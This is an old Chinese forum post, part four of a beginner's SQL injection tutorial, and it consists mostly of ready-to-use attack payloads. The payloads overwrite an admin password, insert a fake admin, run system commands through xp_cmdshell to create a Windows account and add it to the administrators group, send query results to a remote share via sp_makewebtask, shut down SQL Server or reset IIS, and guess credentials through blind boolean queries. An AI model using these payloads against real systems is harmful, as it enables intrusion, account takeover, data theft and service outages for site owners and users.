发新帖  新投票  回帖  关闭侧栏
441509个阅读者,0条回复 | 打印 | 订阅 | 收藏
隐身或者不在线

发表时间:2005-7-13 20:11

菜鸟SQL注入详解4



glf5g 发表在 网络纵横 华声论坛 http://bbs.voc.com.cn/forum-34-1.html


如何在数据库修改,插入数据?
当我们成功地获得了表名,字段。就很容易在数据库里修改甚至插入新的数据。如更改"adminroot"
的密码,我们
http://xxx.xxx.com/job/grxx.asp?id=23 ;UPDATE admin_login SET password =
newpas5 WHERE
u_name=adminroot--
要在数据表里插入新记录,
http://xxx.xxx.com/job/grxx.asp?id=23 ;INSERT INTO admin_login (u_id,
u_name,
password, contents) VALUES (123,xiaolin,pas,lambgirl)--
现在,我们就能用xiaolin pas 来登陆了。

如何远程执行SQL漏洞?
能进行SQL注入命令表明,我们能查任何我们想要查的。默认安装的的MS SQL服务
在系统中权限等于管理员。我们能利用执行存储过程像xp_cmdshell 来执行远程破坏:
; exec master..xp_cmdshell ping 192.168.0.2--
(如果单引号不能用,就换成双引号)
分号表示结束前面的SQL查询,从而允许你开始另一个新的SQL命令。
为了检验命令成功执行,你可以监听从192.168.0.2发出的的ICMP包。查看是否发出包。
#tcpdump icmp
如果你没有接到PING主机的回应,得到一个错误的提示,权限错误,那么,很可能管理员
限制了WEB用户对xp_cmdshell 等的权限。
如何找出MYSQL查询结果?
这很容易用sp_makewebtask来把你查询的结果放到一个HTML里:
; EXEC master..sp_makewebtask "\\192.168.0.2\share\girlxiaolin.html",
"SELECT * FROM
INFORMATION_SCHEMA.TABLES"
但是目标IP必须共享文件夹。

http://xxx.xxx.com/job/grxx.asp?id=23 ;;exec master..xp_cmdshell “net user
name
password /add”--
xp_cmdshell 用于调用系统命令,于是,用net命令新建了用户名为name、密码为password
的windows的帐号,接着:
http://xxx.xxx.com/job/grxx.asp?id=23 ;;exec master..xp_cmdshell “net
localgroup name
administrators /add”--
将新建的帐号name加入管理员组,不过这种方法只于用sa连接数据库的情况,否则,没有权限调用
xp_cmdshell。
其他方面,如利用SQL的命令填写:
将使SQL服务快速关闭
用户名: ; shutdown with nowait; --
密码: 不填
导致严重问题,网络故障。
用户名: ; exec master..xp_cmdshell iisreset; --
密码:不填
关于ACCESS部分,
和ASSQL差不了多少,也是先在http://xxx.xxx.com/index.asp?id=10
出错的话,继续提交:
先测试是否有ADMIN表,
http://xxx.xxx.com/index.asp?id=10 and 0<>(select count(*) from admin)
http://xxx.xxx.com/index.asp?id=10 and 1=(select count(*) from admin)
没有的话,就换一个名字,如user啊,什么的。再猜里面是否有username这个字段.
and 1=(select count(*) from admin where len(username)>0)
如果出错,同理,我们也可以给它换一个名字。
接下来我们猜用户的具体名字。
and 1=(select count(*) from admin where left(username,1)=l)
这时我们可以一个一个地来猜。
and 1=(select count(*) from admin where left(username,2)=la)
接下来猜密码,猜密码的道理同猜用户名一样。
and 1=(select count(*) from admin where left(password,1)=l)

[end]


发新帖 新投票
 回帖
查看积分策略说明快速回复主题
你的用户名: 密码:   免费注册(只要30秒)


使用个人签名

(请您文明上网理性发言!并遵守相关规定
   



Processed in 0.031407 s, 8 q - 无图精简版,sitemap,